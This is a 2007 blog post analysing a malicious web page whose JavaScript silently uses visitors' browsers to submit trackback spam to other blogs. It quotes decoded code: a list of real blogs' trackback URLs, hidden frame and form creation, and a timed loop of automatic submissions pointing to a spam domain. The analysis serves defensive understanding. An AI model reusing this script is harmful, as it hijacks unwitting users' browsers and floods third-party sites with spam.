Spreading Comment and Trackback Spam Through Zombie Browsers
August 7, 2007 – 11:57 amSince my move to Wordpress, I have been noticing a lot of funny track back hits going back to my old Movable Type installation. First of all, all of these hits were coming back from different IP addresses and different browsers. Second, they all had the same refer. Something was fishy. On further examination, I found something really interesting
It seems that the refer is hosting a malicious HTML page. That page consists of a set of Javascripts which load new frames and submit track back pings to other blogs on the Internet. That means that anyone going to that malicious page is automatically submitting trackback spam somewhere else on the Net. When blog owners see the spam, they go back to check out the refer and end up on the malicios page, which then submits more track back spams in the background. The track backs themselves lead to fake blogs and search results, which eventually either lead to drug stores or ad-populated pages.
There are several interesting things here. First - the malicious page kind of propagates itself. Second, the page does not use any kind of security exploits - everything is done through regular Javascripts. Third, there is apparently enough interest in refers that it generates enough traffic to affect other sites. All of these is very similar to the way regular spam and viruses are spread - through zombie computers, except in this case the browsers are zombies.
Below are some snippets from the code of this site (you can view the decoded site source here - courtesy of Stephane “Gooby” Theroux’s decoder):
First the site loads an array with the target track back URLs:
var ss = new Array('http://140.99.61.57/cgi-bin/mt/mt-tb.cgi/211', 'http://64.130.58.178/cgi-sys/cgiwrap/ebradio/managed-mt/mt-tb.cgi/55', 'http://www.creativedestruction.com/MT/mt-tb.cgi/25', 'http://www.thirstytheologian.com/mt/mt-tb.cgi/287', 'http://www.ultrasparky.org/mt/mt-tb.cgi/5406', 'http://blog.avramovic.info/bblog/trackback.php/9/', 'http://www.technologyevangelist.com/cgi-bin/mt-tb.fcgi/685', 'http://www.edspresso.com/cgi-bin/mt/mt-t.cgi/1002', 'http://hellyes.nl/iam/wp-trackback.php?p=3', 'http://varnam.org/mt33/mt-tb.cgi/157', 'http://varnam.org/mt33/mt-tb.cgi/157');
The next step is to create the frames and forms inside:
var d = parent.fr1.document;
d.write('<div id=mainpage style="display:none">');
d.write('<div id=tbdescr align=center></div>');
d.write('<form name=fff method=POST target=fr2>');
d.write('<input type=text name=url>');
d.write('<input type=text name=title>');
d.write('<input type=text name=excerpt>');
d.write('<input type=text name=blogname>');
d.write('</form>');
d.write('</div>');
tbsp();
Third step is to load up the forms and submit:
function tbsp()
{
var d = parent.fr1.document;
d.getElementById('tbdescr').innerHTML = ii ': ' unescape(ss[ii]);
d.fff.action = unescape(ss[ii]);
d.fff.url.value = unescape('http://getdayfile.nicespace.ca');
d.fff.title.value = unescape('Diphtheria');
d.fff.excerpt.value = 'Read more about ' unescape('Diphtheria');
d.fff.blogname.value = unescape('Diphtheria');
d.fff.submit();
...
Fourth step - rinse, repeat:
if (ii > 0) {
ii--;
setTimeout('tbsp()', 10000);
} else {
setTimeout('refresh()', 2000);
}
The reason why this is allowed to happen is due to the fact that the browser does not restrict interaction with child frames. Thus, dynamically created frames with malicious form submits can happen without user interaction. It is not out of the realm of possibility for this type of attack to be extended to any sort of Web service or web application that can accept GET or POST. In fact it would probably be trivial but most social networks and web applications should filter out Javascript.
At the current time there is no protection against this type of attack other than disabling Javascript or having the browser warn you before submitting a form.
Comments are welcome at blog /at/ shaftek [dot] org.
